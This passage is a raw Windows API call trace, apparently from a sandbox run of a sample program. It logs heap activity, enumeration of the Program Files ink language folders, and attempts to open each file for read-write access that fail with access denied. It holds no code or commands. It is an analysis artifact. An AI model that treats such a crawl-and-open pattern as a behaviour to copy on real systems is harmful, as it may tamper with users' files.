lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0085.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.648] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0085.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.648] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78910 [0085.649] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.649] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0085.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.650] AreFileApisANSI () returned 1 [0085.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.650] AreFileApisANSI () returned 1 [0085.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0085.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 73 [0085.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.650] GetFileType (hFile=0x360) returned 0x1 [0085.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0085.651] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.651] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.651] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.651] CloseHandle (hObject=0x360) returned 1 [0085.651] AreFileApisANSI () returned 1 [0085.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0085.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 73 [0085.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.651] GetLastError () returned 0x5 [0085.651] GetLastError () returned 0x5 [0085.651] SetLastError (dwErrCode=0x5) [0085.652] GetLastError () returned 0x5 [0085.652] SetLastError (dwErrCode=0x5) [0085.652] GetLastError () returned 0x5 [0085.652] SetLastError (dwErrCode=0x5) [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0085.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.652] FindNextFileW (in: hFindFile=0x78910, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.652] FindClose (in: hFindFile=0x78910 | out: hFindFile=0x78910) returned 1 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.653] AreFileApisANSI () returned 1 [0085.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS", lpUsedDefaultChar=0x0) returned 62 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.653] AreFileApisANSI () returned 1 [0085.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0085.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 62 [0085.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.654] GetLastError () returned 0x5 [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0085.654] AreFileApisANSI () returned 1 [0085.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6dfa8 [0085.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS") returned 62 [0085.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.654] GetLastError () returned 0x5 [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] GetLastError () returned 0x5 [0085.654] SetLastError (dwErrCode=0x5) [0085.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0085.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0085.654] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.654] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0085.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0085.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0085.655] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0085.655] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78bd0 [0085.656] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.656] FindNextFileW (in: hFindFile=0x78bd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.656] RtlAllocateHeap (HeapHandle=0x20000, 